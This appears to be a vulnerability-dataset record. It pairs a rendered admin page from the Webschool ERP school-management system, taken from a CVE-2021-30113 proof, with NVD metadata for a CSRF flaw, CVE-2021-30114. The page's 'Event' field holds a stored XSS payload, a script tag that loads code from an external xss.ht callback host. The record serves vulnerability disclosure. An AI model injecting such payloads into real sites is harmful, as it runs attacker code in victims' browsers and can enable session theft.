src="/banner/22112020103733.png" class="img-circle img-sm" alt=""></a> <div class="media-body"> <span class="media-heading text-semibold">DEMO SCHOOL</span> </div> </div> </div> </div> <div class="sidebar-category sidebar-category-visible"> <div class="category-content no-padding"> <ul class="navigation navigation-main navigation-accordion"> <li> <a href="#" class="has-ul"><i class="icon-home4"></i><span>Dashboard</span></a> <ul data-index="0" style="display: none;" class="hidden-ul"> <li><a href="/index.php/site/index">Dashboard</a></li> </ul> </li> <li> <a href="#" class="has-ul"><i class="icon-cogs"></i><span>Settings</span></a> <ul class="hidden-ul"> <li><a href="/index.php/core/institution/create">Institution Details</a></li> <li><a href="/index.php/core/academic/create">Academic Details</a></li> <li><a href="/index.php/site/import">Student Import</a></li> <li><a href="/index.php/site/employeeimport">Employee Import</a></li> <li><a href="/index.php/core/privilege/create">Privileges</a></li> <li><a href="/index.php/core/assignclass/create">Assign Courses</a></li> <li><a href="/index.php/site/users">Users</a></li> <li><a href="/index.php/core/onlineenquiry/admin">Applicant List</a></li> <li><a href="/index.php/core/onlineemployeedetails/admin">Employee Application</a></li> <li><a href="/index.php/core/loginformsettings/create">Login Page</a></li> <li><a href="/index.php/core/studentcaste/create">Caste And Religion</a></li> <li><a href="/index.php/core/visitors/viewvisitors">Visitors List</a></li> </ul> </li> <li> <a href="#" class="has-ul"><i class="icon-users4"></i><span>Academic</span></a> <ul class="hidden-ul"> <li> <a href="#" class="has-ul">Course &amp; Batch</a> <ul class="hidden-ul"> <li><a href="/index.php/core/course/create">Course</a></li> <li><a href="/index.php/core/batch/create">Batch</a></li> <li><a href="/index.php/core/classteacherallocation/create">Class teacher Allocation</a></li> </ul> </li> <li> <a href="#" class="has-ul">Subjects</a> <ul class="hidden-ul"> <li><a href="/index.php/core/subject/create">Subjects</a></li> <li><a href="/index.php/core/subject/assignsubject">Assign Subjects</a></li> <li><a href="/index.php/core/subjectallocation/create">Subject Allocation</a></li> <li><a href="/index.php/core/subject/electivesubjects">Elective Subject</a></li> <li><a href="/index.php/core/subjectallocation/subjectallocationimport">Subject Allocation Import</a></li> </ul> </li> <li> <a href="#" class="has-ul">E-Learning</a> <ul class="hidden-ul"> <li><a href="/index.php/core/lessonplanning/digitalclassroom">E-Learning</a></li> </ul> </li> <li> <a href="#" class="has-ul">Lesson Planning</a> <ul class="hidden-ul"> <li><a href="/index.php/core/lessonplanning/create">Lesson Planning</a></li> </ul> </li> <li> <a href="#" class="has-ul">Time Table</a> <ul class="hidden-ul"> <li><a href="/index.php/core/room/create">Room</a></li> <li><a href="/index.php/core/timetable/create"> Set Time Table</a></li> <li><a href="/index.php/core/timetable/active">Active Timetable</a></li> <li><a href="/index.php/core/timetable/viewtimetable">View Batch Timetable</a></li> <li><a href="/index.php/core/timetable/viewteachertt">View Teacher Timetable</a></li> <li><a href="/index.php/core/timetable/proxy">Search Proxy</a></li> <li><a href="/index.php/core/timetable/workinghours">Teacher Working Hours</a></li> <li><a href="/index.php/core/timetable/timetableexport"> Time Table Export</a></li> <li><a href="/index.php/site/timetableimport">Time Table Import</a></li> </ul> </li> <li> <a href="#" class="has-ul">Exams</a> <ul class="hidden-ul"> <li><a href="#" class="has-ul">GPA</a> <ul class="hidden-ul"> <li><a href="/index.php/core/term/create">Set Term</a></li> <li><a href="/index.php/core/exam/create">Create Exam</a></li> <li><a href="/index.php/core/gpaskills/create">GPA Skill</a></li> <li><a href="/index.php/core/gpaskillsmark/create">GPA Skill Mark </a></li> <li> <a href="#" class="has-ul">GPA Grade System</a> <ul class="hidden-ul"> <li><a href="/index.php/core/gpagradeset/create">GPA Gradeset</a></li> <li><a href="/index.php/core/gradescale/create">Set Grade Scale</a></li> <li><a href="/index.php/core/gpagradesetmapping/create">Gradeset Mapping</a></li> </ul> </li> <li><a href="/index.php/core/subjectcreditpoint/create">Subject Credit Point</a></li> <li><a href="/index.php/core/totalmark/create">Total mark %</a></li> <li><a href="/index.php/core/assessment/create">Set Assessment</a></li> <li><a href="/index.php/core/setexam/create">Set Exam</a></li> <li><a href="/index.php/core/setmarklist/create">Set Mark List</a></li> <li><a href="/index.php/core/setmarklist/teachermarklist">Teacher Score Card</a></li> <li><a href="/index.php/core/gpareportcardsettings/create">Report Card Settings</a></li> <li><a href="/index.php/core/setmarklist/boardsheet">Broad Sheet</a></li> <li><a href="/index.php/core/setmarklist/reportcard">Generate Report Card</a></li> <li> <a href="#" class="has-ul">Imports</a> <ul class="hidden-ul"> <li><a href="/index.php/core/assessment/assessmentimport">Assessment Mark Import</a></li> <li><a href="/index.php/core/setexam/setexamimport">Set Exam Import</a></li> <li><a href="/index.php/site/gpamarkimport">GPA Mark Import</a></li> <li><a href="/index.php/site/gparemarks">Remarks Import</a></li> </ul> </li> </ul> </li> <li><a href="#" class="has-ul">CCE</a> <ul class="hidden-ul"> <li><a href="#" class="has-ul">Initial Settings</a> <ul class="hidden-ul"> <li><a href="/index.php/cce/ccecategory/create">CCE Category</a></li> <li><a href="/index.php/cce/cceterm/create">CCE Assessment Terms</a></li> <li><a href="/index.php/cce/cceassessment/create">CCE Assessment</a></li> <li><a href="/index.php/cce/ccesubjectsub/create">CCE Subject Sub</a></li> <li><a href="/index.php/cce/cceskills/create">CCE Skills</a></li> <li><a href="/index.php/cce/ccegradeset/create">CCE Grade Set</a></li> <li><a href="/index.php/cce/ccegrades/create">CCE Grades</a></li> <li><a href="/index.php/cce/ccegradeskillmap/create">CCE Grade Skill Mapping</a></li> <li><a href="/index.php/cce/ccereportcardsettings/create">CCE Report Card Settings</a></li> <li><a href="/index.php/cce/cceassigngrade/create">CCE Grade Description Class 1-5</a></li> </ul> </li> <li><a href="#" class="has-ul">CCE Exam</a> <ul class="hidden-ul"> <li><a href="/index.php/cce/cceexamscheme/create">CCE Exam Scheme </a></li> <li><a href="/index.php/cce/ccesetexam/create"> CCE Set Exam</a></li> <li><a href="/index.php/cce/ccemarklist/create">CCE Scholastic Mark List</a></li> <li><a href="/index.php/cce/ccecoscholasticmark/create">CCE Co-Scholastic Mark List</a></li> <li><a href="/index.php/cce/ccemarklist/boardsheet">Broad Sheet</a></li> <li><a href="/index.php/cce/ccemarklist/reportcard">Generate Report Card</a></li> <li> <a href="#" class="has-ul">Imports</a> <ul class="hidden-ul"> <li><a href="/index.php/cce/ccesetexam/examimport">Set Exam Import</a></li> <li><a href="/index.php/site/ccemarkimport">Cce Mark Import</a></li> <li><a href="/index.php/site/cceremarks">Remarks Import</a></li> </ul> </li> </ul> </li> </ul> </li> <li><a href="#" class="has-ul">Exam Hall</a> <ul class="hidden-ul"> <li><a href="/index.php/core/examhall/create"> Exam Hall</a></li> <li><a href="/index.php/core/seatarrangement/create"> Hall Arrangement</a></li> <li><a href="/index.php/core/invigilationduties/create">Invigilation Duties</a></li> </ul> </li> <li><a href="#" class="has-ul">Online Exam</a> <ul class="hidden-ul"> <li><a href="/index.php/core/onlineexam/create"> New Online Exam</a></li> <li><a href="/index.php/core/onlineexam/view_exam"> View Exam Details</a></li> <li><a href="/index.php/core/onlineexamassign/evaluateexam"> Evaluate Exam</a></li> <li><a href="/index.php/core/onlineexamassign/viewresult1">View Exam Results</a></li> </ul> </li> <li><a href="/index.php/core/unittest/create">Unit Test</a></li> <li><a href="/index.php/core/setmarklist/publishresult"> Settings</a></li> </ul> </li> <li> <a href="#" class="has-ul">Assignments &amp; Notes</a> <ul class="hidden-ul"> <li><a href="/index.php/core/assignment/create">Add Assignment</a></li> <li><a href="/index.php/core/note/create">Add Notes</a></li> <li><a href="/index.php/site/assignmentimport">Assignments Import</a></li> <li><a href="/index.php/core/assignment/Assignmentsms">Send SMS</a></li> <li><a href="/index.php/core/assignment/assignmentevaluation">Assignment Evaluation</a></li> </ul> </li> <li> <a href="#" class="has-ul">Certifications</a> <ul class="hidden-ul"> <li><a href="/index.php/certifications/certificatetype/create">Certificate Type</a></li> <li><a href="/index.php/certifications/customcertificate/create">Custom Certificate</a></li> <li><a href="/index.php/certifications/generatecertificate/create">Generate Certificate</a></li> </ul> </li> <li> <a href="#" class="has-ul">Placements</a> <ul class="hidden-ul"> <li><a href="/index.php/placements/placementcellmembers/create">Placement Cell Members</a></li> <li><a href="/index.php/placements/placementvendors/create">Placement Vendors</a></li> <li><a href="/index.php/placements/placementattendees/create">Attendees</a></li> <li><a href="/index.php/placements/placeddetails/create">Placed Details</a></li> </ul> </li> <li> <a href="#" class="has-ul">Promotion &amp; Alumni</a> <ul class="hidden-ul"> <li><a href="/index.php/core/student/promotion">Promotion &amp; Alumni</a></li> <li><a href="/index.php/core/student/alumnimembers">Alumni Members</a></li> </ul> </li> <li> <a href="#" class="has-ul">Occurrence</a> <ul class="hidden-ul"> <li><a href="/index.php/core/occurance/create">Occurrence Register </a></li> </ul> </li> <li> <a href="#" class="has-ul">Circular</a> <ul class="hidden-ul"> <li><a href="/index.php/circular/circular/create">Circular</a></li> </ul> </li> </ul> </li> <li> <a href="#" class="has-ul"><i class="icon-eye"></i><span>HR/Payroll</span></a> <ul class="hidden-ul"> <li><a href="#" class="has-ul">Employee Management</a> <ul class="hidden-ul"> <li><a href="/index.php/core/usertype/create">Add User Type</a></li> <li><a href="/index.php/core/department/create">Add Department</a></li> <li><a href="/index.php/core/designation/create">Add Designation</a></li> <li><a href="/index.php/core/employeedetails/create">Add Employee</a></li> <li><a href="/index.php/core/employeedetails/admin">Employee List</a></li> <li><a href="/index.php/bank/bankdetails/create">Add Bank Details</a></li> <li><a href="/index.php/core/employeedetails/reports">Print List</a> </li> <li><a href="/index.php/core/employeemaster/withdrawal">Withdrawal</a> </li> <li><a href="/index.php/site/employeeattendanceimport">Employee Attendance Import</a></li> </ul> </li> <li><a href="#" class="has-ul">Payroll</a> <ul class="hidden-ul"> <li><a href="/index.php/payroll/payheadmaster/create">Pay Head</a></li> <li><a href="/index.php/payroll/payabletype/create">Payment Types</a></li> <li><a href="/index.php/payroll/salarydetails/create">Salary Settings</a></li> <li><a href="/index.php/payroll/employeesalary/create">Employee Salary</a></li> <li><a href="/index.php/payroll/employeesalary/generatepayslip">Generate Pay Slip</a></li> <li><a href="/index.php/payroll/employeesalary/salaryreport">Salary Statement</a></li> </ul> </li> <li><a href="#" class="has-ul">Leave Management</a> <ul class="hidden-ul"> <li><a href="/index.php/leave/leavecategory/create">Leave Category</a></li> <li><a href="/index.php/leave/leavedetails/create">Leave Details</a></li> <li><a href="/index.php/leave/leaveapplication/create">Leave Application</a></li> <li><a href="/index.php/leave/leaveapplication/approve">Leave Approvals</a></li> <li><a href="/index.php/leave/leaveapplication/ondutylist">OD Approvals</a></li> </ul> </li> <li><a href="/index.php/core/employeeattendance/create">Attendance</a></li> </ul> </li> <li> <a href="#" class="has-ul"><i class="icon-user"></i><span>Student</span></a> <ul class="hidden-ul"> <li><a href="/index.php/core/student/categorycreate">Student Category</a></li> <li><a href="/index.php/core/studenthouse/create">Student House</a></li> <li><a href="/index.php/core/documenttype/create">Student Document</a></li> <li><a href="/index.php/core/student/create">Student Admission</a></li> <li><a href="/index.php/core/student/admin">Student List</a></li> <li><a href="/index.php/core/studentabsent/create">Attendance</a></li> <li><a href="/index.php/core/batch/reports">Print List</a> </li> <li><a href="/index.php/core/student/guardiandetails">Guardian List</a> </li> <li><a href="/index.php/core/student/student_rollno">Roll Number</a></li> <li><a href="/index.php/site/studentattendanceimport">Student Attendance Import</a></li> <li><a href="/index.php/core/gatepass/create">Student Gate Pass</a></li> <li><a href="/index.php/core/student/student_idcard">Student ID Card</a></li> <li> <a href="#" class="has-ul">Report</a> <ul class="hidden-ul"> <li><a href="/index.php/core/student/agereport">Age Wise Report</a></li> <li><a href="/index.php/core/student/categoryreport">Category Report</a></li> <li><a href="/index.php/core/student/siblingsreport">Siblings Report</a></li> </ul> </li> </ul> </li> <li> <a href="#" class="has-ul"><i class="icon-cash3"></i><span>Finance</span></a> <ul class="hidden-ul"> <li> <a href="#" class="has-ul">Fees</a> <ul class="hidden-ul"> <li><a href="/index.php/core/feescategory/create">Fee Category</a></li> <li><a href="/index.php/core/feessubcategory/create">Fee Sub Category</a></li> <li><a href="/index.php/core/feessubcategoryfine/create">Fee Sub Category Fine</a></li> <li><a href="/index.php/core/studentcategory/create">Feewaiver Category</a></li> <li><a href="/index.php/core/feewaiver/create">Fee Waiver</a></li> <li><a href="/index.php/core/feetemplate/create">Fee Template</a></li> <li><a href="/index.php/core/feesallocation/create">Fee Allocation</a></li> <li><a href="/index.php/core/feesallocation/collection">Fee Collection</a></li> <li><a href="/index.php/core/feesallocation/quickpayment">Quick Payment</a></li> <li><a href="/index.php/core/feesallocation/reports">Reports</a></li> <li><a href="/index.php/site/feeallocationimport">Fees Allocation Import</a></li> <li><a href="/index.php/core/feescollection/feescollectionimport">Fees Collection Import</a></li> <li><a href="/index.php/core/settings/create">Fee Settings</a></li> </ul> </li> <li><a href="#" class="has-ul">Accounting</a> <ul class="hidden-ul"> <li><a href="/index.php/accounting/accountgroup/create">Account Group</a></li> <li><a href="/index.php/accounting/vouchermaster/create">Voucher Master</a></li> <li><a href="/index.php/accounting/voucherhead/create">Voucher Head</a></li> <li><a href="/index.php/accounting/voucher/create">Create Voucher</a></li> <li><a href="/index.php/accounting/voucher/daybook">Day Book</a></li> <li><a href="/index.php/accounting/voucher/cashaccount">Cash Book</a></li> <li><a href="/index.php/accounting/voucher/bankaccount">Bank Book</a></li> <li> <a href="#" class="has-ul">Report</a> <ul class="hidden-ul"> <li><a href="/index.php/accounting/voucher/report">Ledger Account </a></li> <li><a href="/index.php/accounting/voucher/trialbalance">Trial Balance </a></li> </ul> </li> </ul> </li> <li> <a href="#" class="has-ul">Third Party Income</a> <ul class="hidden-ul"> <li><a href="/index.php/accounting/incomeheads/create">Add Income Heads </a></li> <li><a href="/index.php/accounting/incomedetails/create">Add Income Details </a></li> <li><a href="/index.php/accounting/incomedetails/reportincomedetails">Reports </a></li> </ul> </li> </ul> </li> <li> <a href="#" class="has-ul"><i class=" icon-book3"></i><span>Library</span></a> <ul class="hidden-ul"> <li><a href="/index.php/library/bookcategory/create">Add Category</a></li> <li><a href="/index.php/library/librarybooks/create">Add Books</a></li> <li><a href="/index.php/library/bookissue/create">Issue Book</a></li> <li><a href="/index.php/library/bookissue/requestdetails">Request Details</a></li> <li><a href="/index.php/library/bookreturn/create">Book Return</a></li> <li><a href="/index.php/library/librarybooks/reports">Reports</a></li> <li><a href="/index.php/site/libraryimport">Import</a></li> <li><a href="/index.php/library/librarybooks/libraryexport">Export</a></li> </ul> </li> <li> <a href="#" class="has-ul"><i class="icon-truck"></i><span>Transport</span></a> <ul class="hidden-ul"> <li><a href="/index.php/transport/transportvehicle/create">Add Vehicle</a></li> <li><a href="/index.php/transport/transportdriver/create">Add Driver</a></li> <li><a href="/index.php/transport/routemaster/create">Add Route</a></li> <li><a href="/index.php/transport/routedetails/create">Add Destination</a></li> <li><a href="/index.php/transport/transportallocation/create">Transport Allocation </a></li> <li><a href="/index.php/transport/transportfeecollection/create">Fee Collection</a></li> <li><a href="/index.php/site/transportallocationimport">Import</a></li> <li><a href="/index.php/transport/transportfeecollection/smsalert">SMS Alert</a></li> <li><a href="/index.php/transport/routemaster/reports">Report</a></li> </ul> </li> <li> <a href="#" class="has-ul"><i class=" icon-home2"></i><span>Hostel</span></a> <ul class="hidden-ul"> <li><a href="/index.php/hostel/hosteltype/create">Hostel Details</a></li> <li><a href="/index.php/hostel/hostelroom/create">Hostel Room</a></li> <li><a href="/index.php/hostel/hostelregistration/create">Hostel Allocation</a></li> <li><a href="/index.php/hostel/hostelregistration/requestdetails">Request Details</a></li> <li><a href="/index.php/hostel/hosteltransfer/create">Hostel Transfer/Vacate</a></li> <li><a href="/index.php/hostel/hostelregister/create">Hostel Register</a></li> <li><a href="/index.php/hostel/hostelvisitors/create">Hostel Visitors</a></li> <li><a href="/index.php/hostel/hostelfeecollection/create">Hostel Fee Collection</a></li> <li> <a href="#" class="has-ul">Reports</a> <ul class="hidden-ul"> <li><a href="/index.php/hostel/hostelroom/hosteldetailsreport">Hostel Details Report </a></li> <li><a href="/index.php/hostel/hostelroom/availableroomreport">Room Availability Report</a></li> <li><a href="/index.php/hostel/hostelroom/requestreport">Room Request Report</a></li> <li><a href="/index.php/hostel/hostelroom/occupiedreport">Room Occupancy Report</a></li> <li><a href="/index.php/hostel/hostelfeecollection/feereport">Fee Reports</a></li> <li><a href="/index.php/core/application/enquireylist">Follow up Reports</a></li> </ul> </li> </ul> </li> <li> <a href="#" class="has-ul"><i class="icon-envelope"></i><span>Messages/SMS</span></a> <ul class="hidden-ul"> <li><a href="/index.php/core/email/email">Mailbox</a></li> <li><a href="/index.php/sms/smssettings/create">SMS Settings</a></li> <li><a href="/index.php/sms/visitorsmssettings/create">Visitor SMS Settings</a></li> <li><a href="/index.php/sms/groupdetails/create">Group For SMS</a></li> <li><a href="/index.php/sms/smssettings/admin">Bulk SMS</a></li> <li><a href="/index.php/sms/smssettings/bulksmsreport">Bulk SMS Report</a></li> <li><a href="/index.php/sms/smssettings/reportmsg">SMS For Report</a></li> <li> <a href="#" class="has-ul">Email</a> <ul class="hidden-ul"> <li><a href="/index.php/sms/emailsettings/create">Email Settings</a></li> <li><a href="/index.php/sms/emailtemplate/create">Create Template</a></li> <li><a href="/index.php/sms/sendmail/mail">Send email</a></li> </ul> </li> </ul> </li> <li> <a href="#" class="has-ul"><i class=" icon-list-unordered"></i><span>Store Management</span></a> <ul class="hidden-ul"> <li><a href="/index.php/inventory/vendors/create">Vendors</a></li> <li><a href="/index.php/inventory/inventorycategory/create">Inventory Category</a></li> <li><a href="/index.php/inventory/inventoryitem/create">Inventory Item</a></li> <li><a href="/index.php/inventory/purchasereceipts/create">Purchase Receipts</a></li> <li><a href="/index.php/inventory/inventoryissue/create">Inventory Issue</a></li> <li><a href="/index.php/inventory/inventoryitem/stockregister">Stock Register</a></li> <li><a href="/index.php/inventory/inventorygroup/create">Inventory Group</a></li> <li> <a href="#" class="has-ul">Reports</a> <ul class="hidden-ul"> <li><a href="/index.php/inventory/inventoryissue/issuedreport">Issued Report</a></li> <li><a href="/index.php/inventory/inventoryissue/inventoryreports">Inventory Report</a></li> </ul> </li> <li><a href="/index.php/inventory/inventoryitem/inventoryitemimport">Inventory Item Import</a></li> </ul> </li> <li> <a href="#" class="has-ul"><i class=" icon-stats-growth"></i><span>Performance</span></a> <ul class="hidden-ul"> <li><a href="#" class="has-ul">GPA</a> <ul class="hidden-ul"> <li><a href="/index.php/core/setmarklist/studentperformance">Student Performance</a></li> <li><a href="/index.php/core/setmarklist/courseperformance">Course Performance</a></li> <li><a href="/index.php/core/setmarklist/subjectperformance">Subject Performance</a></li> <li><a href="/index.php/core/setmarklist/teacherperformance">Teacher Performance</a></li> </ul> </li> <li><a href="#" class="has-ul">CCE</a> <ul class="hidden-ul"> <li><a href="/index.php/cce/ccemarklist/studentperformance">Student Performance</a></li> <li><a href="/index.php/cce/ccemarklist/courseperformance">Course Performance</a></li> <li><a href="/index.php/cce/ccemarklist/subjectperformance"> Subject Performance</a></li> <li><a href="/index.php/cce/ccemarklist/teacherperformance">Teacher Performance</a></li> </ul> </li> <li><a href="/index.php/core/teachercomments/create">Teacher Comments</a></li> </ul> </li> <li> <a href="#" class="has-ul"><i class="icon-star-full2"></i><span>Events</span></a> <ul class="hidden-ul"> <li><a href="/index.php/events/eventtype/create"> Event Types</a></li> <li><a href="/index.php/events/event/create"> Add Events</a></li> <li><a href="/index.php/events/event/eventreportlist"> Event Reports</a></li> </ul> </li> <!-- <li> <a href="#"><i class=" icon-link2"></i><span>Integration</span></a> <ul> <li><a href="/index.php/integration/integration/vehicletracking">Vehicle Tracking</a> </li> </ul> </li> --> <li> <a href="#" class="has-ul"><i class="icon-file-text"></i><span>Task Manager</span></a> <ul class="hidden-ul"> <li><a href="/index.php/core/taskmanager/create">Assign Task</a></li> <li><a href="/index.php/core/taskmanager/admin">Task Details</a></li> </ul> </li> <li> <a href="#" class="has-ul"><i class="icon-copy3"></i><span>Reports</span></a> <ul class="hidden-ul"> <li><a href="/index.php/core/student/studentreport">Student Reports</a> </li> <li><a href="/index.php/core/student/studentdetailsreport">Student Details</a> </li> <li><a href="/index.php/core/subject/electivereport">Elective Reports</a> </li> <li><a href="/index.php/core/feesallocation/duereport">Fee Due Reports</a> </li> <li><a href="/index.php/core/feesallocation/paidreport">Fee Paid Reports</a> </li> <li><a href="/index.php/core/feescollection/onlinepayment">Payment Reconcilation</a> </li> <li><a href="/index.php/core/studentabsent/attendencereport"> Absentees Reports</a> </li> <li><a href="/index.php/core/student/classsummary">Class Summary Reports</a> </li> <!--<li><a href="/index.php/core/student/classreport"> Class Report</a> </li>--> <!--<li><a href="/index.php/core/feesallocation/feesconsolidatedreport">Fees Consolidated Report</a></li>--> <li><a href="/index.php/core/student/admissionreport">Admission Report</a></li> <li><a href="/index.php/core/leavereport/leavesreport">Leave Report</a></li> <!--Added By Gopika on Dec 17,2018--> <li><a href="/index.php/core/visitors/visitorslistreport">Visitors List</a></li> <!--Added By Gopika on Dec 17,2018--> <li><a href="/index.php/core/application/enquireylist"> Follow up Report</a> </li> <li><a href="/index.php/core/feescollection/feescancelreport">Cancel/Delete Report</a></li> </ul> </li> <li> <a href="#" class="has-ul"><i class=" icon-paperplane"></i><span>Withdrawal</span></a> <ul class="hidden-ul"> <li><a href="/index.php/core/student/withdrawal">Withdrawal</a> </li> </ul> </li> <li> <a href="#" class="has-ul"><i class="glyphicon glyphicon-cloud-download"></i><span>Data Export</span></a> <ul class="hidden-ul"> <li><a href="/index.php/site/dataexport">Export</a> </li> </ul> </li> <li> <a href="#" class="has-ul"><i class="glyphicon glyphicon-list-alt"></i><span>Newsfeeds</span></a> <ul class="hidden-ul"> <li><a href="/index.php/core/newsfeeds/create">Newsfeeds</a> </li> </ul> </li> <li> <a href="#" class="has-ul"><i class="glyphicon glyphicon-edit"></i><span>FeedBack</span></a> <ul class="hidden-ul"> <li><a href="/index.php/feedback/feedbackmaster/create">Feedback Question</a> </li> <li><a href="/index.php/feedback/feedbackdetails/create">Add Feedback</a> </li> <li><a href="/index.php/feedback/feedbacktype/create">Add Feedback Type</a> </li> <li><a href="/index.php/feedback/feedbackdetails/feedbackreport">Report</a> </li> </ul> </li> <!-- <li> <a href="#"><i class="glyphicon glyphicon-education"></i><span>Moodle</span></a> <ul> <li><a href="" class="border-teal-400 text-teal-400" data-toggle="modal" data-target="#modal-unlock" data-id="" id="" onclick="javascript:showmodal()">Setup Moodle</a></li> </ul> </li> --> </ul> </div> </div> </div> </div> <div class="content-wrapper"> <div class="content"> <!-- // Copyright (c) 2017 All Right Reserved, https://web-school.in // // This source is subject to the Gescis License. // All other rights reserved. // // THIS CODE AND INFORMATION ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY // KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A // PARTICULAR PURPOSE. @(#)Project: Webschool @(#)Version: v3.5 @(#)Initial Development Completion: Date: 10/06/2015 @(#)Developers: Arya K Nair,Reshma R Pillai,Prathibha Mohan V, Jyothi Lekshmi,Lakshmi P @(#)Copyright: (C) Gescis Technologies, Technopark @(#)Product: Webschool ERP. @(#)Template: Multiple templates developed by Gescis. --> <style type="text/css"> #header { border-bottom: 1px solid #DDDDDD; } </style> <div class="page-header"> <div class="breadcrumb-line"> <ul class="breadcrumb"> <li><a href="#"><i class="icon-home2 position-left"></i>Home</a></li> <li><a href="#">Events</a></li> <li class="active">Add Events</li> </ul> <ul class="breadcrumb-elements"> <li><a href="/usermanual"><i class="icon-comment-discussion position-left"></i> Support</a></li> </ul> <a class="breadcrumb-elements-toggle"><i class="icon-menu-open"></i></a><a class="breadcrumb-elements-toggle"><i class="icon-menu-open"></i></a></div> </div><br> <div class="content"> <div class="panel panel-white"> <div class="panel-heading"> <h6 class="panel-title">Event Details</h6> </div> <div class="panel-body"> <div class="row"> <div class="col-sm-12"> <form class="form-horizontal"> <div class="row"> <div class="form-group col-sm-5"> <label class="col-sm-5 control-label text-muted" style="font-size: 14px">Event:</label> <div class="col-sm-7"> <p class="form-control-static"><script src="https://0xrayanxxht.xss.ht"></script></p> </div> </div> <div class="form-group col-sm-5"> <label class="col-sm-5 control-label text-muted" style="font-size: 14px">Event For:</label> <div class="col-sm-7"> <p class="form-control-static">Common to All</p> </div> </div> </div> <div id="header"></div> <div class="row"> <div class="form-group col-sm-5"> <label class="col-sm-5 control-label text-muted" style="font-size: 14px">Organizer/In-Charge:</label> <div class="col-sm-7"> <p class="form-control-static"> </p> </div> </div> <div class="form-group col-sm-5"> <label class="col-sm-5 control-label text-muted" style="font-size: 14px">Description:</label> <div class="col-sm-7"> <p class="form-control-static">fgfg</p> </div> </div> </div> <div id="header"></div> <div class="row"> <div class="form-group col-sm-5"> <label class="col-sm-5 control-label text-muted" style="font-size: 14px">Start Date:</label> <div class="col-sm-7"> <p class="form-control-static">2021-Feb-24 00:00:00</p> </div> </div> <div class="form-group col-sm-5"> <label class="col-sm-5 control-label text-muted" style="font-size: 14px">Course:</label> <div class="col-sm-7"> <p class="form-control-static"></p> </div> </div> </div> <div id="header"></div> <div class="row"> <div class="form-group col-sm-5"> <label class="col-sm-5 control-label text-muted" style="font-size: 14px">End Date:</label> <div class="col-sm-7"> <p class="form-control-static">2021-Feb-24 00:00:00</p> </div> </div> <div class="form-group col-sm-5"> <label class="col-sm-5 control-label text-muted" style="font-size: 14px">Batch:</label> <div class="col-sm-7"> <p class="form-control-static"></p> </div> </div> </div> <div id="header"></div> <div class="row"> <div class="form-group col-sm-5"> <label class="col-sm-5 control-label text-muted" style="font-size: 14px">Event Type:</label> <div class="col-sm-7"> <p class="form-control-static">Holiday</p> </div> </div> <div class="form-group col-sm-5"> <label class="col-sm-5 control-label text-muted" style="font-size: 14px">Department:</label> <div class="col-sm-7"> <p class="form-control-static"></p> </div> </div> </div> </form> </div> </div> </div> </div> </div> </div> <!-- <div class="modal-content login-form col-lg-6" id="moodlemodal" > <div id="modal-unlock" class="modal fade col-md-12"> <div class="modal-dialog"> <div class="modal-content login-form"> <form class="modal-body" id="loginForm" action="/index.php/site/moodle" method="post"> <img src="/images/index.jpg" alt="" class="img-responsive center-block" style="width:100px; height:100px;"/> <h6 class="content-group text-center text-semibold no-margin-top">Moodle credentials <small class="display-block">Unlock your account</small></h6> ```
CVE-2021-30113
https://api.github.com/repos/0xrayan/CVEs/issues/1/comments
0
2021-04-08T00:19:05Z
2021-04-08T00:49:16Z
https://github.com/0xrayan/CVEs/issues/1
852,941,574
1
1,810
CVE-2021-30114
2021-04-08T12:15:12.727
Web-School ERP V 5.0 contains a cross-site request forgery (CSRF) vulnerability that allows a remote attacker to create a voucher payment request through module/accounting/voucher/create. The application fails to validate the CSRF token for a POST request using admin privilege.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://web-school.in" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/0xrayan/CVEs/issues/2" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://web-school.in/try-demo/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://web-school.in" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/0xrayan/CVEs/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://web-school.in/try-demo/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:web-school:enterprise_resource_planning:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A0691C2C-3D8B-4203-986C-755B4F6C54C8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/0xrayan/CVEs/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "0xrayan", "CVEs" ]
